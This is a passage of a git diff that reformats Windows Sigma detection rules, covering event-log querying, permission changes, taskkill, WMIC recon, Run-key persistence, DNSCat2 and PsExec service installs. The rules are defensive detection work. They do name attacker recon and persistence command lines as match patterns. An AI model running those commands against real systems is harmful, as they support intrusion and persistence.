4688 Channel: Security selection_shell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI SubjectLogonId: '0x3e7' diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml index 1ff0c8b56..e68e65835 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml @@ -1,14 +1,11 @@ title: EventLog Query Requests By Builtin Utilities id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f related: - - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf - type: derived + - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf + type: derived status: experimental -description: 'Detect attempts to query the contents of the event log using command - line utilities. Attackers use this technique in order to look for sensitive information - in the logs such as passwords, usernames, IPs, etc. - - ' +description: | + Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1 @@ -28,27 +25,26 @@ detection: EventID: 4688 Channel: Security selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - NewProcessName|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - NewProcessName|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - NewProcessName|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - NewProcessName|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' - condition: process_creation and (selection_wmi or all of selection_wevtutil_* - or all of selection_wmic_* or selection_cmdlet) + condition: process_creation and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet) falsepositives: - Legitimate log access by administrators or troubleshooting tools level: medium diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml index 9cf24f1c6..4feb484b7 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml @@ -21,34 +21,32 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - /grant - /setowner - - /inheritance:r - NewProcessName|endswith: + - /inheritance:r # Remove all inherited ACEs + NewProcessName|endswith: - \cacls.exe - \icacls.exe - - \net.exe - - \net1.exe + - \net.exe # "grant" Option available when used with "net share" + - \net1.exe # "grant" Option available when used with "net share" selection_2: - CommandLine|contains: -r - NewProcessName|endswith: \attrib.exe + CommandLine|contains: -r + NewProcessName|endswith: \attrib.exe selection_3: - NewProcessName|endswith: \takeown.exe + NewProcessName|endswith: \takeown.exe filter_optional_dynatrace_1: - CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history - /reset + CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history /reset filter_optional_dynatrace_2: - CommandLine|contains|all: - - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant - :r ' + CommandLine|contains|all: + - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - S-1-5-19:F filter_optional_vscode: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Programs\Microsoft VS Code - :\Program Files\Microsoft VS Code filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86)\Avira - :\Program Files\Avira condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml index 822bdb61a..f0b5540d6 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml @@ -1,14 +1,9 @@ title: Process Terminated Via Taskkill id: 86085955-ea48-42a2-9dd3-85d4c36b167d status: experimental -description: 'Detects execution of "taskkill.exe" in order to stop a service or a - process. Look for suspicious parents executing this command in order to hunt for - potential malicious activity. - - Attackers might leverage this in order to conduct data destruction or data encrypted - for impact on the data stores of services like Exchange and SQL Server. - - ' +description: | + Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. + Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process author: frack113 @@ -26,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \taskkill.exe - - OriginalFileName: taskkill.exe + - NewProcessName|endswith: \taskkill.exe + - OriginalFileName: taskkill.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /f' - ' /im ' filter_main_installers: @@ -39,7 +34,6 @@ detection: ParentProcessName|endswith: .tmp condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Expected FP with some processes using this techniques to terminate one of their - processes during installations and updates + - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates level: low ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml index 661a07f2c..25ba0f3b4 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml @@ -1,18 +1,13 @@ title: System Information Discovery Via Wmic.EXE id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e related: - - id: 9d5a1274-922a-49d0-87f3-8c653483b909 - type: derived + - id: 9d5a1274-922a-49d0-87f3-8c653483b909 + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, disk drive names, memory capacity, display resolution, - baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ @@ -35,13 +30,13 @@ detection: EventID: 4688 Channel: Security selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_get: - CommandLine|contains: get + CommandLine|contains: get selection_classes: - CommandLine|contains: + CommandLine|contains: - baseboard - bios - cpu @@ -53,7 +48,7 @@ detection: - startup - win32_videocontroller selection_attributes: - CommandLine|contains: + CommandLine|contains: - caption - command - driverversion @@ -70,5 +65,6 @@ detection: condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - VMWare Tools serviceDiscovery scripts +# Note: Might be upgraded to a medium detection rules after some time level: low ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml index 0c0ee2f05..e6ff79350 100644 --- a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml +++ b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml @@ -1,12 +1,10 @@ title: Microsoft Office Trusted Location Updated id: a0bed973-45fa-4625-adb5-6ecdf9be70ac related: - - id: f742bde7-9528-42e5-bd82-84f51a8387d2 - type: similar + - id: f742bde7-9528-42e5-bd82-84f51a8387d2 + type: similar status: experimental -description: Detects changes to the registry keys related to "Trusted Location" of - Microsoft Office. Attackers might add additional trusted locations to avoid macro - security restrictions. +description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. references: - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 author: Nasreddine Bencherchali (Nextron Systems) @@ -35,7 +33,6 @@ detection: - :\Program Files (x86)\Microsoft Office\ condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - During office installations or setup, trusted locations are added, which will - trigger this rule. + - During office installations or setup, trusted locations are added, which will trigger this rule. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml index 9c84b44da..b93fbb685 100644 --- a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml +++ b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml @@ -1,15 +1,10 @@ title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace id: 1c2a3268-3881-414a-80af-a5b313b14c0e status: experimental -description: 'Detects the setting of a registry inside the "\Shell\Open\Command" value - with PowerShell classes from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/ @@ -29,7 +24,7 @@ detection: EventID: 4657 Channel: Security selection_key: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \Shell\Open\Command selection_value_img: NewValue|contains: @@ -48,7 +43,6 @@ detection: - .TripleDESCryptoServiceProvider condition: registry_set and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml b/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml index cdee02e38..ea9bfcba6 100644 --- a/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml +++ b/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml @@ -1,9 +1,7 @@ title: Scheduled Task Deletion id: 4f86b304-3e02-40e3-aa5d-e88a167c9617 status: test -description: Detects scheduled task deletion events. Scheduled tasks are likely to - be deleted if not used for persistence. Malicious Software often creates tasks - directly under the root node e.g. \TASKNAME +description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME references: - https://twitter.com/matthewdunwoody/status/1352356685982146562 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699 @@ -19,19 +17,16 @@ tags: logsource: product: windows service: security - definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit - Other Object Access Events has to be configured to allow this detection. We - also recommend extracting the Command field from the embedded XML in the event - data.' + definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.' detection: security: Channel: Security selection: EventID: 4699 filter_main_generic: - TaskName: \Microsoft\Windows\RemovalTools\MRT_ERROR_HB + TaskName: \Microsoft\Windows\RemovalTools\MRT_ERROR_HB # Triggered by ParentCommandLine=C:\WINDOWS\system32\MRT.exe /EHB /HeartbeatFailure ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=SubmitHeartbeatReportData,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f /HeartbeatError 0x80072f8f filter_main_firefox: - TaskName|contains: '\Mozilla\Firefox Default Browser Agent ' + TaskName|contains: '\Mozilla\Firefox Default Browser Agent ' # Triggered by firefox updates condition: security and (selection and not 1 of filter_*) falsepositives: - Software installation diff --git a/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml b/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml index 193710402..7b3ecb80f 100644 --- a/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml +++ b/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml @@ -1,8 +1,7 @@ title: Execution via CL_Mutexverifiers.ps1 (2 Lines) id: 6609c444-9670-4eab-9636-fe4755a851ce status: unsupported -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 - module +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ - https://twitter.com/pabraeken/status/995111125447577600 diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml index c53f25542..192a89fc8 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml @@ -22,16 +22,15 @@ detection: EventID: 4688 Channel: Security selection_recon: - CommandLine|contains: '>>' - CommandLine|endswith: temps.dat - NewProcessName|endswith: + CommandLine|contains: '>>' + CommandLine|endswith: temps.dat + NewProcessName|endswith: - \tasklist.exe - \qwinsta.exe - \ipconfig.exe - \hostname.exe selection_persistence: - CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" - /v "WinNetworkSecurity" /t REG_SZ /d + CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d condition: process_creation and (selection_recon | near selection_persistence) fields: - SubjectUserName diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml index 51dd4f9a1..8b0a7a208 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml @@ -24,11 +24,11 @@ detection: EventID: 4688 Channel: Security netCommand1: - CommandLine: net view /DOMAIN + CommandLine: net view /DOMAIN netCommand2: - CommandLine: net session + CommandLine: net session netCommand3: - CommandLine: net share + CommandLine: net share timeframe: 1m condition: process_creation and (netCommand1 | near netCommand2 and netCommand3) falsepositives: diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml index fef0c6227..501e0f974 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml @@ -1,9 +1,7 @@ title: DNSCat2 Powershell Implementation Detection Via Process Creation id: b11d75d6-d7c1-11ea-87d0-0242ac130003 status: unsupported -description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. - Counting nslookup processes spawned by PowerShell will show hundreds or thousands - of instances if PS DNSCat2 is active locally. +description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. references: - https://github.com/lukebaggett/dnscat2-powershell - https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html @@ -25,13 +23,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: \nslookup.exe + CommandLine|endswith: \nslookup.exe ParentProcessName|endswith: - \powershell.exe - \pwsh.exe - NewProcessName|endswith: \nslookup.exe - condition: (process_creation and selection) | count(NewProcessName) by ParentNewProcessName - > 100 + NewProcessName|endswith: \nslookup.exe + condition: (process_creation and selection) | count(NewProcessName) by ParentNewProcessName > 100 fields: - NewProcessName - ParentProcessName diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml index 18fa0c50d..42a361338 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - arp.exe - at.exe - attrib.exe @@ -62,7 +62,6 @@ detection: timeframe: 5m condition: (process_creation and selection) | count() by MachineName > 5 falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: low ruletype: Sigma diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml index c8b073b0e..4fcf50cbe 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml @@ -1,8 +1,7 @@ title: Reconnaissance Activity Using BuiltIn Commands id: 2887e914-ce96-435f-8105-593937e90757 status: unsupported -description: Detects execution of a set of builtin commands often used in recon stages - by different attack groups +description: Detects execution of a set of builtin commands often used in recon stages by different attack groups references: - https://twitter.com/haroonmeer/status/939099379834658817 - https://twitter.com/c_APT_ure/status/939475433711722497 @@ -23,29 +22,28 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine: - - tasklist - - net time - - systeminfo - - whoami - - nbtstat - - net start - - qprocess - - nslookup - - hostname.exe - - netstat -an - - CommandLine|endswith: - - \net1 start - - \net1 user /domain - - \net1 group /domain - - \net1 group "domain admins" /domain - - \net1 group "Exchange Trusted Subsystem" /domain - - \net1 accounts /domain - - \net1 user net localgroup administrators + - CommandLine: + - tasklist + - net time + - systeminfo + - whoami + - nbtstat + - net start + - qprocess + - nslookup + - hostname.exe + - netstat -an + - CommandLine|endswith: + - \net1 start + - \net1 user /domain + - \net1 group /domain + - \net1 group "domain admins" /domain + - \net1 group "Exchange Trusted Subsystem" /domain + - \net1 accounts /domain + - \net1 user net localgroup administrators timeframe: 15s condition: (process_creation and selection) | count() by CommandLine > 4 falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index c30c52a29..da5cdd059 100644 --- a/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml @@ -1,7 +1,6 @@ title: MSI Spawned Cmd and Powershell Spawned Processes id: 38cf8340-461b-4857-bf99-23a41f772b18 -description: This rule looks for Windows Installer service (msiexec.exe) spawning - command line and/or powershell that spawns other processes +description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 @@ -14,8 +13,7 @@ tags: logsource: product: windows category: process_creation - definition: Works only if Enrich Sysmon events with additional information about - process in ParentOfParentImage check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section detection: process_creation: EventID: 4688 @@ -38,6 +36,6 @@ falsepositives: - Unknown level: high enrichment: - - EN_0001_cache_sysmon_event_id_1_info - - EN_0002_enrich_sysmon_event_id_1_with_parent_info + - EN_0001_cache_sysmon_event_id_1_info # http://bit.ly/314zc6x + - EN_0002_enrich_sysmon_event_id_1_with_parent_info # http://bit.ly/2KmSC0l ruletype: Sigma diff --git a/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml index e2f4717d1..f718bb884 100644 --- a/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml +++ b/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml @@ -1,7 +1,6 @@ title: Windows Kernel and 3rd-Party Drivers Exploits Token Stealing id: 8065b1b4-1778-4427-877f-6bf948b26d38 -description: Detection of child processes spawned with SYSTEM privileges by parents - with non-SYSTEM privileges and Medium integrity level +description: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level references: - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment tags: @@ -13,8 +12,7 @@ date: 2019/06/03 logsource: category: process_creation product: windows - definition: Works only if Enrich Sysmon events with additional information about - process in ParentIntegrityLevel check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section detection: process_creation: EventID: 4688 @@ -28,4 +26,5 @@ detection: falsepositives: - Unknown level: high + ruletype: Sigma diff --git a/sigma/builtin/unsupported/win_mal_service_installs.yml b/sigma/builtin/unsupported/win_mal_service_installs.yml index a6b9eeeab..8df939a48 100644 --- a/sigma/builtin/unsupported/win_mal_service_installs.yml +++ b/sigma/builtin/unsupported/win_mal_service_installs.yml @@ -1,7 +1,6 @@ title: Malicious Service Installations id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a -description: Detects known malicious service installs that only appear in cases of - lateral movement, credential dumping, and other suspicious activities. +description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 modified: 2022/03/21 @@ -13,8 +12,8 @@ tags: - attack.persistence - attack.privilege_escalation - attack.t1003 - - attack.t1035 - - attack.t1050 + - attack.t1035 # an old one + - attack.t1050 # an old one - car.2013-09-005 - attack.t1543.003 - attack.t1569.002 diff --git a/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml b/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml index dc29a03ff..959be6468 100644 --- a/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,7 +1,6 @@ title: Metasploit Or Impacket Service Installation Via SMB PsExec id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 -description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and - Impacket psexec.py by triggering on specific service installation +description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 modified: 2022/03/21 @@ -25,7 +24,7 @@ detection: selection_1: ImagePath|re: ^%systemroot%\\[a-zA-Z]{8}\.exe$ ServiceName|re: (^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$) - StartType: '3' + StartType: '3' # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 ServiceType: '0x10' filter: ServiceName: PSEXESVC @@ -37,8 +36,7 @@ fields: - ServiceName - ServiceFileName falsepositives: - - Possible, different agents with a 8 character binary and a 4, 8 or 16 character - service name + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high status: unsupported ruletype: Sigma diff --git a/sigma/builtin/unsupported/win_remote_schtask.yml b/sigma/builtin/unsupported/win_remote_schtask.yml index 450717d33..9efcd82df 100644 --- a/sigma/builtin/unsupported/win_remote_schtask.yml +++ b/sigma/builtin/unsupported/win_remote_schtask.yml @@ -1,8 +1,7 @@ title: Remote Schtasks Creation id: cf349c4b-99af-40fa-a051-823aa2307a84 status: unsupported -description: Detects remote execution via scheduled task creation or update on the - destination host +description: Detects remote execution via scheduled task creation or update on the destination host author: Jai Minton, oscd.community date: 2020/10/05 references: @@ -15,9 +14,7 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection (not in the baseline - recommendations by Microsoft). + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). detection: security: Channel: Security diff --git a/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml b/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml index 9b5cf3bae..c2f881cf5 100644 --- a/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml +++ b/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml @@ -1,9 +1,7 @@ title: Enumeration via the Global Catalog id: 619b020f-0fd7-4f23-87db-3f51ef837a34 status: unsupported -description: Detects enumeration of the global catalog (that can be performed using - BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain - width. +description: Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156 author: Chakib Gzenayi (@Chak092), Hosni Mribah @@ -15,8 +13,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Windows Filtering Platform > Filtering - Platform Connection" must be configured for Success + definition: The advanced audit policy setting "Windows Filtering Platform > Filtering Platform Connection" must be configured for Success detection: security: Channel: Security diff --git a/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml b/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml index 9c3d7bb2b..f644638af 100644 --- a/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml +++ b/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml @@ -1,9 +1,7 @@ title: Rare Schtasks Creations id: b0d77106-7bb0-41fe-bd94-d1752164d066 status: unsupported -description: Detects rare scheduled tasks creations that only appear a few times per - time frame and could reveal password dumpers, backdoor installs or other types - of malicious code +description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code author: Florian Roth (Nextron Systems) date: 2017/03/23 modified: 2023/02/24 @@ -16,10 +14,7 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection (not in the baseline - recommendations by Microsoft). We also recommend extracting the Command field - from the embedded XML in the event data. + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data. detection: security: Channel: Security diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml index 8396524c9..079ae0258 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml @@ -1,8 +1,7 @@ title: Password Spraying via Explicit Credentials id: 196a29c2-e378-48d8-ba07-8a9e61f7fab9 status: unsupported -description: Detects a single user failing to authenticate to multiple users using - explicit credentials. +description: Detects a single user failing to authenticate to multiple users using explicit credentials. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco, Zach Mathis @@ -21,10 +20,9 @@ detection: selection: EventID: 4648 filter: - SubjectUserName|endswith: $ + SubjectUserName|endswith: $ # There will be much noise from computer accounts to UMFD-0, DWM-1, etc... timeframe: 1h - condition: (security and selection and not filter) | count(TargetUserName) by - SubjectUserName > 10 + condition: (security and selection and not filter) | count(TargetUserName) by SubjectUserName > 10 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml index 5ab29d7f5..68a36f1e6 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml @@ -1,8 +1,7 @@ title: Multiple Users Failing to Authenticate from Single Process id: fe563ab6-ded4-4916-b49f-a3a8445fe280 status: unsupported -description: Detects failed logins with multiple accounts from a single process on - the system. +description: Detects failed logins with multiple accounts from a single process on the system. references: - 